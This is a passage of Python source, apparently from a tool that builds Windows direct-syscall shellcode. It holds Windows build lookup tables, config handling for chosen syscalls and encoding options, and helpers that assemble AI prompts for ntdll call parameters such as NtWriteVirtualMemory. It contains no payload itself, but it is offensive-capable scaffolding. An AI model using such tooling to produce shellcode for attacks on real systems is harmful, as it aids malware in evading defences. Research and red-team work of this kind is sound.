my_stdout\r\nsys.stdout=oldsysOut\r\nsampleVals=False\r\nshowStruct = True\r\n# showStruct = False\r\nintegrateAI=False\r\naiFinalResult = None\r\n\r\nconfigOptions={}\r\nclass shellcode():\r\n\tdef __init__(self):\r\n\t\tself.osChoices = []\r\n\t\tself.show_comments = True\r\n\t\tself.printStringLiteral = True\r\n\t\tself.osChoices2 = []\r\n\t\tself.list_of_syscalls=[]\r\n\t\tself.style=\"fs\"\r\n\t\tself.intendedCompiler=\"nasm\"\r\n\t\tself.useSharedData=True\r\n\t\tself.user12Teb=True\r\n\t\tself.encodeUSD=False\r\n\t\tself.encodeUSDKey=0x909\r\n\t\tself.addUSD=True\r\n\t\tself.addUSDVal=0x20345242\r\n\tdef style(self):\r\n\t\treturn self.style\r\n\tdef comp(self):\r\n\t\treturn self.intendedCompiler\r\n\tdef setStyle(self,style):\r\n\t\tself.style=style\r\n\tdef setComp(self,comp):\r\n\t\tself.intendedCompiler=comp\r\n\r\nclass configOpt():\r\n\tdef __init__(self):\r\n\t\tself.r22h2=False\r\n\t\tself.r21h2 =False\r\n\t\tself.r21h1 =False\r\n\t\tself.r20h2 =False\r\n\t\tself.r2004 =False\r\n\t\tself.r1909 =False\r\n\t\tself.r1903 =False\r\n\t\tself.r1809 =False\r\n\t\tself.r1803 =False\r\n\t\tself.r1709 =False\r\n\t\tself.r1703 =False\r\n\t\tself.r1607 =False\r\n\t\tself.r1511 =False\r\n\t\tself.r1507 =False\r\n\t\tself.b21h2 = False\r\n\t\tself.b22h2 = False\r\n\r\n\t\r\nclass winReleases():\t\t\r\n\tdef __init__(self):\r\n\t\t# self.win10ReverseLookup={\"19044\":\"21h2\", \"19043\":\"21h1\", \"19042\":\"20h2\", \"19041\":\"2004\", \"18363\":\"1909\", \"18362\":\"1903\", \"17763\":\"1809\", \"17134\":\"1803\", \"16299\":\"1709\", \"15063\":\"1703\", \"14393\":\"1607\", \"10586\":\"1511\", \"10240\":\"1507\"}\r\n\t\tself.win10ReverseLookup={\"19044\":\"21h2, Win10\", \"19043\":\"21h1, Win10\", \"19042\":\"20h2, Win10\", \"19041\":\"2004, Win10\", \"18363\":\"1909, Win10\", \"18362\":\"1903, Win10\", \"17763\":\"1809, Win10\", \"17134\":\"1803, Win10\", \"16299\":\"1709, Win10\", \"15063\":\"1703, Win10\", \"14393\":\"1607, Win10\", \"10586\":\"1511, Win10\", \"10240\":\"1507\"}\r\n\t\tself.win10ReverseLookupHex={\"4A64\": \"21h2\", \"4A65\": \"22h2\", \"4A63\": \"21h1\", \"4A62\": \"20h2\", \"4A61\": \"2004\", \"47BB\": \"1909\", \"47BA\": \"1903\", \"4563\": \"1809\", \"42EE\": \"1803\", \"3FAB\": \"1709\", \"3AD7\": \"1703\", \"3839\": \"1607\", \"295A\": \"1511\", \"2800\": \"1507\"}\r\n\t\t# Win11 21h2 build 22000 55F0\r\n\t\tself.win11ReverseLookupHex={\"55F0\":\"21h2\", \"585D\":\"22h2\"}\r\n\t\tself.win11ReverseLookup={\"22000\":\"21h2, Win11\", \"22621\":\"22h2, Win11\"}\r\n\t\tself.winOSReverseLookupHex={\"4A64\": \"Windows 10\",\"4A65\": \"Windows 10\", \"4A63\": \"Windows 10\", \"4A62\": \"Windows 10\", \"4A61\": \"Windows 10\", \"47BB\": \"Windows 10\", \"47BA\": \"Windows 10\", \"4563\": \"Windows 10\", \"42EE\": \"Windows 10\", \"3FAB\": \"Windows 10\", \"3AD7\": \"Windows 10\", \"3839\": \"Windows 10\", \"295A\": \"Windows 10\", \"2800\": \"Windows 10\", \"55F0\":\"Windows 11\",\"585D\":\"Windows 11\", \"1DB0\":\"Windows 7\", \"1DB1\":\"Windows 7\", \"4F7C\":\"Windows Server 2022\"}\r\n\t\tself.winOSReverseLookup={\"4A64\":\"Windows 10\", \"4A65\": \"Windows 10\", \"21h1\":\"Windows 10\", \"20h2\":\"Windows 10\", \"2004\":\"Windows 10\", \"1909\":\"Windows 10\", \"1903\":\"Windows 10\", \"1809\":\"Windows 10\", \"1803\":\"Windows 10\", \"1709\":\"Windows 10\", \"1703\":\"Windows 10\", \"1607\":\"Windows 10\", \"1511\":\"Windows 10\", \"1507\":\"Windows 10\",\"1DB0\":\"Windows 7\", \"1DB1\":\"Windows 7\", \"4F7C\":\"Windows Server 2022\",\"55F0\":\"Windows 11\", \"585D\":\"Windows 11\"}\r\n\t\tself.win10ReverseLookupBackup={\"4A64\":\"21h2\", \"4A65\":\"22h2\",\"21h1\":\"21h1\", \"20h2\":\"20h2\", \"2004\":\"2004\", \"1909\":\"1909\", \"1903\":\"1903\", \"1809\":\"1809\", \"1803\":\"1803\", \"1709\":\"1709\", \"1703\":\"1703\", \"1607\":\"1607\", \"1511\":\"1511\", \"1507\":\"1507\"}\r\n\r\n\t\t# Windows Server 2022 build 20348 4F7C\r\n\t\t# Windows 7 Sp0 7600 1DB0\r\n\t\t# Windows 7 Sp1 7601 1DB1\r\n\t\tself.win7ReverseLookupHex={\"1DB0\":\"SP0\", \"1DB1\":\"SP1\"}\r\n\t\tself.win7ReverseLookup={\"7600\":\"Win7, Sp0\", \"7601\":\"Win7, Sp1\"}\r\n\t\tself.winServer22ReverseLookupHex={\"4F7C\":\"20348, Windows Server 2022\"}\r\n\t\tself.winOSBoolSelected={\"4A64\": False, \"4A65\": False, \"4A63\": False, \"4A62\": False, \"4A61\": False, \"47BB\": False, \"47BA\": False, \"4563\": False, \"42EE\": False, \"3FAB\": False, \"3AD7\": False, \"3839\": False, \"295A\": False, \"2800\": False, \"55F0\":False, \"585D\":False,\"1DB0\":False, \"1DB1\":False, \"4F7C\":False}\r\n\t\tself.releaseOptions={\"r14\":\"4A65\",\"r13\":\"4A64\", \"r12\":\"21h1\", \"r11\":\"20h2\", \"r10\":\"2004\", \"r9\":\"1909\", \"r8\":\"1903\", \"r7\":\"1809\", \"r6\":\"1803\", \"r5\":\"1709\", \"r4\":\"1703\", \"r3\":\"1607\", \"r2\":\"1511\", \"r1\":\"1507\", \"sp1\":\"1DB1\", \"sp0\":\"1DB0\", \"b1\":\"55F0\", \"b2\":\"585D\"}\r\n\t\tself.osChoiceToHex={\"4A64\":\"4A64\",\"4A65\":\"4A65\", \"21h1\":\"4A63\", \"20h2\":\"4A62\", \"2004\":\"4A61\", \"1909\":\"47BB\", \"1903\":\"47BA\", \"1809\":\"4563\", \"1803\":\"42EE\", \"1709\":\"3FAB\", \"1703\":\"3AD7\", \"1607\":\"3839\", \"1511\":\"295A\", \"1507\":\"2800\", \"1DB1\":\"1DB1\", \"1DB0\":\"1DB0\", \"55F0\":\"55F0\", \"585D\":\"585D\"}\r\n\t\tself.listWin7Vals=[\"1DB0\", \"1DB1\"]\r\n\t\tself.listWin1011Vals=[\"4A64\", \"4A65\",\"21h1\",\"20h2\",\"2004\",\"1909\",\"1903\",\"1809\",\"1803\",\"1709\",\"1703\",\"1607\",\"1511\",\"1507\",\"55F0\", \"585D\"]\r\n\r\n\r\nclass winSyscalls():\r\n\tdef __init__(self):\r\n\t\twith open(os.path.join(os.path.dirname(__file__), 'WinSysCalls.json'), 'r') as syscall_file:\r\n\t\t\tself.syscall_dict = json.load(syscall_file)\r\n\t\twith open(os.path.join(os.path.dirname(__file__), 'reverseWinSyscallsInt.json'), 'r') as syscall_file:\r\n\t\t\tself.reverseSyscall_dict = json.load(syscall_file)\r\n\r\nclass shellBytes:\r\n\tdef __init__(self):\r\n\t\tself.stringLiteral=\"\"\r\n\t\tself.shellcode=[]\r\n\t\tself.count=0\r\n\t\tself.bytesShellcode=\"\"\r\n\t\tself.shellCodeStrLit=\"\"\r\n# with open(os.path.join(os.path.dirname(__file__), 'syscall_signatures.json'), 'r') as syscall_file:\r\n# syscallPrototypes = json.load(syscall_file)\r\n\r\nconFile = str(\"config.cfg\")\r\n\r\ndef checkWinOSBools():\r\n\t# print (\"builds.winOSBoolSelected\", builds.winOSBoolSelected)\r\n\tbuilds.winOSBoolSelected[\"4A64\"]=False\r\n\tbuilds.winOSBoolSelected[\"4A65\"]=False\r\n\tbuilds.winOSBoolSelected[\"21h1\"]=False\r\n\tbuilds.winOSBoolSelected[\"20h2\"]=False\r\n\tbuilds.winOSBoolSelected[\"2004\"]=False\r\n\tbuilds.winOSBoolSelected[\"1909\"]=False\r\n\tbuilds.winOSBoolSelected[\"1903\"]=False\r\n\tbuilds.winOSBoolSelected[\"1809\"]=False\r\n\tbuilds.winOSBoolSelected[\"1803\"]=False\r\n\tbuilds.winOSBoolSelected[\"1709\"]=False\r\n\tbuilds.winOSBoolSelected[\"1703\"]=False\r\n\tbuilds.winOSBoolSelected[\"1607\"]=False\r\n\tbuilds.winOSBoolSelected[\"1511\"]=False\r\n\tbuilds.winOSBoolSelected[\"1507\"]=False\r\n\tbuilds.winOSBoolSelected[\"1DB0\"]=False\r\n\tbuilds.winOSBoolSelected[\"1DB1\"]=False\r\n\tbuilds.winOSBoolSelected[\"55F0\"]=False\r\n\tbuilds.winOSBoolSelected[\"585D\"]=False\r\n\r\n\r\n\t# print (\"current choices\", sh.osChoices2)\r\n\tfor myOs in sh.osChoices2:\r\n\t\tbuilds.winOSBoolSelected[myOs]=True\r\n\r\n\r\ndef readConf():\r\n\tcon = Configuration(conFile)\r\n\tconr = con.readConf()\r\n\tr22h2= conr.getboolean('Windows 10','r22h2')\r\n\tbuilds.winOSBoolSelected[\"4A65\"]=r22h2\r\n\tr21h2= conr.getboolean('Windows 10','r21h2')\r\n\tbuilds.winOSBoolSelected[\"4A64\"]=r21h2\r\n\tr21h1= conr.getboolean('Windows 10','r21h1')\r\n\tbuilds.winOSBoolSelected[\"21h1\"]=r21h1\r\n\tr20h2= conr.getboolean('Windows 10','r20h2')\r\n\tbuilds.winOSBoolSelected[\"20h2\"]=r20h2\r\n\tr2004= conr.getboolean('Windows 10','r2004')\r\n\tbuilds.winOSBoolSelected[\"2004\"]=r2004\r\n\tr1909= conr.getboolean('Windows 10','r1909')\r\n\tbuilds.winOSBoolSelected[\"1909\"]=r1909\r\n\tr1903= conr.getboolean('Windows 10','r1903')\r\n\tbuilds.winOSBoolSelected[\"1903\"]=r1903\r\n\tr1809= conr.getboolean('Windows 10','r1809')\r\n\tbuilds.winOSBoolSelected[\"1809\"]=r1809\r\n\tr1803= conr.getboolean('Windows 10','r1803')\r\n\tbuilds.winOSBoolSelected[\"1803\"]=r1803\r\n\tr1709= conr.getboolean('Windows 10','r1709')\r\n\tbuilds.winOSBoolSelected[\"1709\"]=r1709\r\n\tr1703= conr.getboolean('Windows 10','r1703')\r\n\tbuilds.winOSBoolSelected[\"1703\"]=r1703\r\n\tr1607= conr.getboolean('Windows 10','r1607')\r\n\tbuilds.winOSBoolSelected[\"1607\"]=r1607\r\n\tr1511= conr.getboolean('Windows 10','r1511')\r\n\tbuilds.winOSBoolSelected[\"1511\"]=r1511\r\n\tr1507= conr.getboolean('Windows 10','r1507')\r\n\tbuilds.winOSBoolSelected[\"1507\"]=r1507\r\n\r\n\tWin7SP0=conr.getboolean('Windows 7','SP0')\r\n\tbuilds.winOSBoolSelected[\"1DB0\"]=Win7SP0\r\n\r\n\tWin7SP1=conr.getboolean('Windows 7','SP1')\r\n\tbuilds.winOSBoolSelected[\"1DB1\"]=Win7SP1\r\n\t\r\n\r\n\tWin11_21h2=conr.getboolean('Windows 11','b21h2')\r\n\tbuilds.winOSBoolSelected[\"55F0\"]=Win11_21h2\r\n\r\n\tWin11_22h2=conr.getboolean('Windows 11','b22h2')\r\n\tbuilds.winOSBoolSelected[\"585D\"]=Win11_22h2\r\n\r\n\tsh.printStringLiteral=conr.getboolean('MISC','print_string_literal_of_bytes')\r\n\tsh.show_comments=conr.getboolean('MISC','show_comments')\r\n\r\n\tsh.style=conr.get('MISC', 'syscall_style')\r\n\tsh.intendedCompiler=conr.get('MISC', 'intended_compiler')\r\n\tsh.useSharedData=conr.getboolean('MISC','use_shareddata_for_win1011')\r\n\t\r\n\tsh.encodeUSD=conr.getboolean('MISC','encode_user_share_data')\r\n\tsh.addUSD=conr.getboolean('MISC','usd_encode_with_add')\r\n\r\n\tsh.user12Teb=conr.getboolean('MISC','get_teb_from_r12') \r\n\r\n\ttemp=conr.get('MISC', 'usd_encode_xor_key')\r\n\ttemp2=conr.get('MISC', 'usd_encode_add_val')\r\n\r\n\ttry:\r\n\t\tsh.encodeUSDKey=int(temp)\r\n\texcept:\r\n\t\tsh.encodeUSDKey=int(temp,16)\r\n\r\n\ttry:\r\n\t\tsh.addUSDVal=int(temp2)\r\n\texcept:\r\n\t\tsh.addUSDVal=int(temp2,16)\r\n\r\n\t# print (red+str(sh.show_comments)+res, \"sh.show_comments\")\r\n\tif r22h2:\r\n\t\tsh.osChoices2.append(\"4A65\")\r\n\tif r21h2:\r\n\t\tsh.osChoices2.append(\"4A64\")\r\n\tif r21h1:\r\n\t\tsh.osChoices2.append(\"21h1\")\r\n\tif r20h2:\r\n\t\tsh.osChoices2.append(\"20h2\")\r\n\tif r2004:\r\n\t\tsh.osChoices2.append(\"2004\")\r\n\tif r1909:\r\n\t\tsh.osChoices2.append(\"1909\")\r\n\tif r1903:\r\n\t\tsh.osChoices2.append(\"1903\")\r\n\tif r1809:\r\n\t\tsh.osChoices2.append(\"1809\")\r\n\tif r1803:\r\n\t\tsh.osChoices2.append(\"1803\")\r\n\tif r1709:\r\n\t\tsh.osChoices2.append(\"1709\")\r\n\tif r1703:\r\n\t\tsh.osChoices2.append(\"1703\")\r\n\tif r1607:\r\n\t\tsh.osChoices2.append(\"1607\")\r\n\tif r1511:\r\n\t\tsh.osChoices2.append(\"1511\")\r\n\tif r1507:\r\n\t\tsh.osChoices2.append(\"1507\")\r\n\tif Win7SP0:\r\n\t\tsh.osChoices2.append(\"1DB0\")\r\n\tif Win7SP1:\r\n\t\tsh.osChoices2.append(\"1DB1\")\r\n\tif Win11_21h2:\r\n\t\tsh.osChoices2.append(\"55F0\")\r\n\tif Win11_22h2:\r\n\t\tsh.osChoices2.append(\"585D\")\r\n\r\n\r\n\t# print (\"sh.osChoices2!!!\")\r\n\t# print (sh.osChoices2)\r\n\r\n\tsh.list_of_syscalls = str(conr['SYSCALLS']['selected_syscalls'])\r\n\r\n\ttry:\r\n\t\tsh.list_of_syscalls = ast.literal_eval(sh.list_of_syscalls)\r\n\t\tif(type(sh.list_of_syscalls) != list):\r\n\t\t\tprint(\"Error:\", sh.list_of_syscalls, \"<-- this should be in list format.\")\r\n\texcept:\r\n\t\tprint(yel + \"The value of\", red + sh.list_of_syscalls, yel + \"is not correct or malformed!!\"+ res)\r\n\t\tsys.exit()\r\n\r\n\tsanitizeSyscalls()\r\n\r\n\r\n\t# print (\"listofSyscalls\", sh.list_of_syscalls)\r\ndef sanitizeSyscallsAdded(tempSys2):\r\n\taddedSyscalls=[]\r\n\tfor term in tempSys2:\r\n\t\tif term.lower() in syscallLowerLookupDict:\r\n\t\t\tterm=syscallLowerLookupDict[term.lower()]\r\n\t\t\taddedSyscalls.append(term)\r\n\treturn addedSyscalls\r\n\t\t\t\r\n\r\ndef sanitizeSyscalls():\r\n\tt=0\r\n\tfor term in sh.list_of_syscalls:\r\n\t\tif term.lower() in syscallLowerLookupDict:\r\n\t\t\tterm=syscallLowerLookupDict[term.lower()]\r\n\t\t\tsh.list_of_syscalls[t]=term\r\n\t\telse:\r\n\t\t\tprint (red+\"The \" +yel + term +red + \" syscall is not present. Check spelling. Item removed.\"+res)\r\n\t\t\tdel sh.list_of_syscalls[t]\r\n\t\tt+=1\r\ndef saveConf(con):\r\n\tglobal configOptions\r\n\ttry:\r\n\t\tcon.changeConf(configOptions)\r\n\t\tcon.save()\r\n\t\tprint(gre + \"\\tConfiguration has been Saved.\\n\" + res)\r\n\texcept Exception as e:\r\n\t\tprint(red + \"\\tCould not save configuration.\" + res, e)\r\n\t\tprint(traceback.format_exc())\r\n\r\n\r\ndef modConf():\r\n\tglobal configOptions\r\n\t# self.winOSBoolSelected={\"4A64\": False, \"4A63\": False, \"4A62\": False, \"4A61\": False, \"47BB\": False, \"47BA\": False, \"4563\": False, \"42EE\": False, \"3FAB\": False, \"3AD7\": False, \"3839\": False, \"295A\": False, \"2800\": False, \"55F0\":False, \"1DB0\":False, \"1DB1\":False, \"4F7C\":False}\r\n\t# listofStrings = ['pushret', \r\n\t# \t\t\t'callpop', \r\n\t# \t\t\t'fstenv', \r\n\t# \t\t\t'syscall', \r\n\t# \t\t\t'heaven', \r\n\t# \t\t\t'peb', \r\n\t# \t\t\t'disassembly', \r\n\t# \t\t\t'pebpresent', \r\n\t# \t\t\t'bit32',\r\n\t# \t\t\t'max_bytes_forward',\r\n\t# \t\t\t'max_bytes_backward',\r\n\t# \t\t\t'max_lines_forward', \r\n\t# \t\t\t'max_lines_backward',\r\n\t# \t\t\t'print_to_screen', \r\n\t# \t\t\t'push_stack_strings', \r\n\t# \t\t\t'ascii_strings', \r\n\t# \t\t\t'wide_char_strings', \r\n\t# \t\t\t'fast_mode', \r\n\t# \t\t\t'find_all', \r\n\t# \t\t\t'dist_mode', \r\n\t# \t\t\t'cpu_count', 'nodes_file', 'output_file', 'dec_operation_type', 'decrypt_file', 'stub_file', 'use_same_file', 'stub_entry_point', 'stub_end', 'shellEntry', 'pebpoints', 'minimum_str_length', 'max_callpop_distance', 'default_outdir', 'print_emulation_result', 'emulation_verbose_mode', 'emulation_multiline','max_num_of_instr','iterations_before_break','break_infinite_loops','timeless_debugging',\"complete_code_coverage\"]\r\n\r\n\r\n\r\n\r\n\r\n\t# maxEmuInstr = emuObj.maxEmuInstr\r\n\t# numOfIter = emuObj.numOfIter\r\n\t# numOfIter = em.maxLoop\r\n\r\n\r\n\t# listofBools = [bPushRet, bCallPop, bFstenv, bSyscall, bHeaven, bPEB, bDisassembly, pebPresent, bit32, bytesForward, bytesBack, linesForward, linesBack,p2screen, bPushStackStrings, bAsciiStrings, bWideCharStrings, dFastMode, dFindAll, dDistr, dCPUcount, dNodesFile, dOutputFile, decryptOpTypes, decryptFile, stubFile, sameFile, stubEntry, stubEnd, shellEntry, pebPoints, minStrLen, maxDistance, sharem_out_dir, bPrintEmulation, emulation_verbose, emulation_multiline, maxEmuInstr, numOfIter, emuObj.breakLoop, emuObj.verbose,em.codeCoverage]\r\n\r\n\tshow_commentsVal=sh.show_comments\r\n\tsyscallStyleVal=sh.style\r\n\tintendedCompilerVal=sh.intendedCompiler\r\n\tuseSharedDataVal=sh.useSharedData\r\n\t\r\n\tboolEncodeUSD=sh.encodeUSD\r\n\tencodeXorKeyVal=hex(sh.encodeUSDKey)\r\n\tboolEncodeWAdd=sh.addUSD\r\n\tencodeAddValsh=hex(sh.addUSDVal)\r\n\r\n\tcheckWinOSBools()\r\n\tr21h2 = builds.winOSBoolSelected[\"4A64\"]\r\n\tr22h2 = builds.winOSBoolSelected[\"4A65\"]\r\n\tr21h1 = builds.winOSBoolSelected[\"21h1\"]\r\n\tr20h2 = builds.winOSBoolSelected[\"20h2\"]\r\n\tr2004 = builds.winOSBoolSelected[\"2004\"]\r\n\tr1909 = builds.winOSBoolSelected[\"1909\"]\r\n\tr1903 = builds.winOSBoolSelected[\"1903\"]\r\n\tr1809 = builds.winOSBoolSelected[\"1809\"]\r\n\tr1803 = builds.winOSBoolSelected[\"1803\"]\r\n\tr1709 = builds.winOSBoolSelected[\"1709\"]\r\n\tr1703 = builds.winOSBoolSelected[\"1703\"]\r\n\tr1607 = builds.winOSBoolSelected[\"1607\"]\r\n\tr1511 = builds.winOSBoolSelected[\"1511\"]\r\n\tr1507 = builds.winOSBoolSelected[\"1507\"]\r\n\tsp0 = builds.winOSBoolSelected[\"1DB0\"]\r\n\tsp1 = builds.winOSBoolSelected[\"1DB1\"]\r\n\tb21h2 = builds.winOSBoolSelected[\"55F0\"]\r\n\tb22h2 = builds.winOSBoolSelected[\"585D\"]\r\n\r\n\t\r\n\r\n\tlistofStrings=[\"r21h2\",\t\"r22h2\", \"r21h1\",\t\"r20h2\",\t\"r2004\",\t\"r1909\",\t\"r1903\",\t\"r1809\",\t\"r1803\",\t\"r1709\",\t\"r1703\",\t\"r1607\",\t\"r1511\",\"r1507\",\"sp0\",\"sp1\", \"b21h2\", \"b22h2\",\"show_comments\",\"syscall_style\", \"intended_compiler\",\"use_shareddata_for_win1011\",\"encode_user_share_data\",\"usd_encode_xor_key\", \"usd_encode_with_add\",\"usd_encode_add_val\",\"get_teb_from_r12\"]\r\n\t\r\n\tlistofBools=[r21h2,r22h2, r21h1, r20h2, r2004, r1909, r1903, r1809, r1803, r1709, r1703, r1607, r1511, r1507,sp0,sp1,b21h2, b22h2, show_commentsVal,syscallStyleVal,intendedCompilerVal,useSharedDataVal,boolEncodeUSD,encodeXorKeyVal,boolEncodeWAdd,encodeAddValsh,sh.user12Teb] \r\n\r\n\tlistofStrings.append(\"selected_syscalls\")\r\n\tlistofBools.append(sh.list_of_syscalls)\r\n\t# print (listofStrings)\r\n\t# print(listofBools)\r\n\r\n\t# listofSyscalls = []\r\n\t# for osv in syscallSelection:\r\n\t# \tif osv.toggle == True:\r\n\t# \t\tlistofSyscalls.append(osv.code)\r\n\t# listofStrings.append('selected_syscalls')\r\n\t# listofBools.append(listofSyscalls)\r\n\r\n\r\n\r\n\t# for booli, boolStr in zip(listofBools, listofStrings):\r\n\t# \tconfigOptions[boolStr] = booli\r\n\r\n\r\n\r\n\t\r\n\r\n\t# Win7SP0=conr.getboolean('Windows 7','SP0')\r\n\t# builds.winOSBoolSelected[\"1DB0\"]=Win7SP0\r\n\r\n\t# Win7SP1=conr.getboolean('Windows 7','SP1')\r\n\t# builds.winOSBoolSelected[\"1DB1\"]=Win7SP1\r\n\t\r\n\t# Win11_21h2=conr.getboolean('Windows 11','r21h2')\r\n\t# builds.winOSBoolSelected[\"55F0\"]=Win11_21h2\r\n\r\n\t# sh.printStringLiteral=conr.getboolean('MISC','print_string_literal_of_bytes')\r\n\t# sh.show_comments=conr.getboolean('MISC','show_comments')\r\n\t# maxEmuInstr = emuObj.maxEmuInstr\r\n\t# numOfIter = emuObj.numOfIter\r\n\t# numOfIter = em.maxLoop\r\n\t# listofBools = [bPushRet, bCallPop, bFstenv, bSyscall, bHeaven, bPEB, bDisassembly, pebPresent, bit32, bytesForward, bytesBack, linesForward, linesBack,p2screen, bPushStackStrings, bAsciiStrings, bWideCharStrings, dFastMode, dFindAll, dDistr, dCPUcount, dNodesFile, dOutputFile, decryptOpTypes, decryptFile, stubFile, sameFile, stubEntry, stubEnd, shellEntry, pebPoints, minStrLen, maxDistance, sharem_out_dir, bPrintEmulation, emulation_verbose, emulation_multiline, maxEmuInstr, numOfIter, emuObj.breakLoop, emuObj.verbose,em.codeCoverage]\r\n\t# listofBools=[]\r\n\t# listofSyscalls = []\r\n\t# for osv in syscallSelection:\r\n\t# \tif osv.toggle == True:\r\n\t# \t\tlistofSyscalls.append(osv.code)\r\n\t# listofStrings.append('selected_syscalls')\r\n\t# listofBools.append(listofSyscalls)\r\n\r\n\t\r\n\ttry:\r\n\t\tfor booli, boolStr in zip(listofBools, listofStrings):\r\n\t\t\t# print (boolStr, booli)\r\n\t\t\tif type (booli)==bool:\r\n\t\t\t\tbooli=(str(booli))\r\n\t\t\tconfigOptions[boolStr] = booli\r\n\t\t# print (configOptions)\r\n\texcept Exception as e:\r\n\t\tprint (e)\r\n\t\tprint(traceback.format_exc())\r\n\t# print (configOptions)\r\n\r\ndef isWin7():\r\n\tif any(item in builds.listWin7Vals for item in sh.osChoices2):\r\n\t\t# print (\"WINDOWS 7!!!\")\r\n\t\t# print (sh.osChoices2)\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\ndef isWin1011():\r\n\tif any(item in builds.listWin1011Vals for item in sh.osChoices2):\r\n\t\t# print (\"WINDOWS 10!!!\")\r\n\t\t# print (sh.osChoices2)\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\ndef buildAiPromptSectionForSyscall(mySyscall, syscall_signature, syscallHeaderSuffixes=None):\r\n\t\"\"\"\r\n\tBuild one AI prompt section like:\r\n\r\n\tthis is for an ntdll user mode call [ntdll!NtWriteVirtualMemory]\r\n\r\n\tpush 0x00000000 ; PULONG NumberOfBytesWritten\r\n\t...\r\n\t\"\"\"\r\n\r\n\tif syscallHeaderSuffixes is None:\r\n\t\tsyscallHeaderSuffixes = {}\r\n\r\n\tsysPrototype = syscall_signature[mySyscall]\r\n\tnumSyscallParams = sysPrototype[0]\r\n\tt = numSyscallParams - 1\r\n\r\n\textraText = syscallHeaderSuffixes.get(mySyscall, \"\")\r\n\theader = f\"this is for an ntdll user mode call [ntdll!{mySyscall}]\"\r\n\tif extraText:\r\n\t\theader += f\" {extraText}\"\r\n\r\n\tlines = [header, \"\"]\r\n\r\n\tfor each in range(numSyscallParams):\r\n\t\tparamType = sysPrototype[1][t]\r\n\t\tparamName = sysPrototype[2][t]\r\n\r\n\t\t# Keep this simple and stable for the AI prompt.\r\n\t\tline = f\"push 0x00000000 ; {paramType} {paramName}\"\r\n\t\tlines.append(line)\r\n\r\n\t\tt -= 1\r\n\r\n\tlines.append(\"\")\r\n\treturn \"\\n\".join(lines)\r\n\r\n\r\ndef chunkList(items, itemsPerChunk):\r\n\tfor i in range(0, len(items), itemsPerChunk):\r\n\t\tyield items[i:i + itemsPerChunk]\r\n\r\n\r\ndef buildApiBlocksFromSyscalls(syscallChoices, syscall_signature, funcsPerBlock=5, syscallHeaderSuffixes=None):\r\n\t\"\"\"\r\n\tReturns a list[str], where each element contains up to funcsPerBlock syscall sections.\r\n\r\n\tExample:\r\n\tapi_blocks[0] = \"this is for ... NtWriteVirtualMemory ...\\n\\nthis is for ... NtProtectVirtualMemory ...\"\r\n\t\"\"\"\r\n\r\n\tif syscallHeaderSuffixes is None:\r\n\t\tsyscallHeaderSuffixes = {}\r\n\r\n\tapiBlocks = []\r\n\r\n\tfor syscallChunk in chunkList(syscallChoices, funcsPerBlock):\r\n\t\tsections = []\r\n\r\n\t\tfor mySyscall in syscallChunk:\r\n\t\t\tsectionText = buildAiPromptSectionForSyscall(\r\n\t\t\t\tmySyscall=mySyscall,\r\n\t\t\t\tsyscall_signature=syscall_signature,\r\n\t\t\t\tsyscallHeaderSuffixes=syscallHeaderSuffixes\r\n\t\t\t)\r\n\t\t\tsections.append(sectionText)\r\n\r\n\t\tapiBlocks.append(\"\\n\".join(sections).strip() + \"\\n\")\r\n\r\n\treturn apiBlocks\r\n\r\ndef stripLeadingTextCaseInsensitive(text, prefix):\r\n\tif not text or not prefix:\r\n\t\treturn text\r\n\r\n\tif text.lower().startswith(prefix.lower()):\r\n\t\ttext = text[len(prefix):]\r\n\r\n\treturn text.lstrip(\" :-\\t\")\r\n\r\ndef buildAiStructureMap(aiFinalResult):\r\n\tstructureMap = {}\r\n\tif not aiFinalResult:\r\n\t\treturn structureMap\r\n\r\n\t# structures = aiFinalResult.get(\"structures\", {})\r\n\t# if not isinstance(structures, dict):\r\n\t# \treturn structureMap\r\n\r\n\tfor structId, structDef in aiFinalResult.get(\"structures\", {}).items():\r\n\t\tif isinstance(structDef, dict):\r\n\t\t\tstructureMap[structId] = structDef\r\n\r\n\treturn structureMap\r\n\r\n\r\ndef initAiState(aiFinalResult):\r\n\tif not aiFinalResult:\r\n\t\treturn {\r\n\t\t\t\"calls\": [],\r\n\t\t\t\"callIndex\": 0,\r\n\t\t\t\"structureMap\": {}\r\n\t\t}\r\n\r\n\treturn {\r\n\t\t\"calls\": aiFinalResult.get(\"calls\", []),\r\n\t\t\"callIndex\": 0,\r\n\t\t\"structureMap\": buildAiStructureMap(aiFinalResult)\r\n\t}\r\n\r\n\r\ndef getNextAiCallEntry(aiState):\r\n\tcallIndex = aiState[\"callIndex\"]\r\n\tcallList = aiState[\"calls\"]\r\n\r\n\tif callIndex >= len(callList):\r\n\t\treturn None\r\n\r\n\tcallEntry = callList[callIndex]\r\n\taiState[\"callIndex\"] += 1\r\n\treturn callEntry\r\n\r\n\r\ndef getAiPushEntry(aiCallEntry, pushIndex):\r\n\tpushList = aiCallEntry.get(\"pushes\", [])\r\n\r\n\tif pushIndex < len(pushList):\r\n\t\tpushEntry = pushList[pushIndex]\r\n\t\tpushValue = pushEntry.get(\"value\", \"0x00000000\")\r\n\t\tadditionalComment = pushEntry.get(\"additionalComment\", \"\")\r\n\t\tstructureRef = pushEntry.get(\"structureRef\")\r\n\telse:\r\n\t\tpushValue = \"0x00000000\"\r\n\t\tadditionalComment = \"\"\r\n\t\tstructureRef = None\r\n\r\n\treturn pushValue, additionalComment, structureRef\r\n\r\n\r\ndef buildStructLinesFromAi(structureRef, aiState, commentColumn=24, showFieldType=True):\r\n\tif not structureRef:\r\n\t\treturn \"\"\r\n\r\n\tstructMap = aiState.get(\"structureMap\", {})\r\n\tif not isinstance(structMap, dict):\r\n\t\treturn \"\"\r\n\r\n\tstructDef = structMap.get(structureRef)\r\n\tif not isinstance(structDef, dict):\r\n\t\treturn \"\"\r\n\r\n\tfields = structDef.get(\"fields\", [])\r\n\tif not isinstance(fields, list) or not fields:\r\n\t\treturn \"\"\r\n\r\n\tlines = []\r\n\tsemicolonPrefix = \" \" * (5 + commentColumn) + \"; \"\r\n\tstart0 = whi + \"Struct:\" + res\r\n\tstart = semicolonPrefix+start0\r\n\tlines.append(start)\r\n\r\n\tfor field in fields:\r\n\t\tfieldName = str(field.get(\"fieldName\", \"UNKNOWN\"))\r\n\t\tfieldType = str(field.get(\"fieldType\", \"UNKNOWN\"))\r\n\t\tfieldValue = str(field.get(\"fieldValue\", \"UNKNOWN\"))\r\n\t\tfieldComment = field.get(\"fieldComment\")\r\n\r\n\t\tif showFieldType:\r\n\t\t\tline = 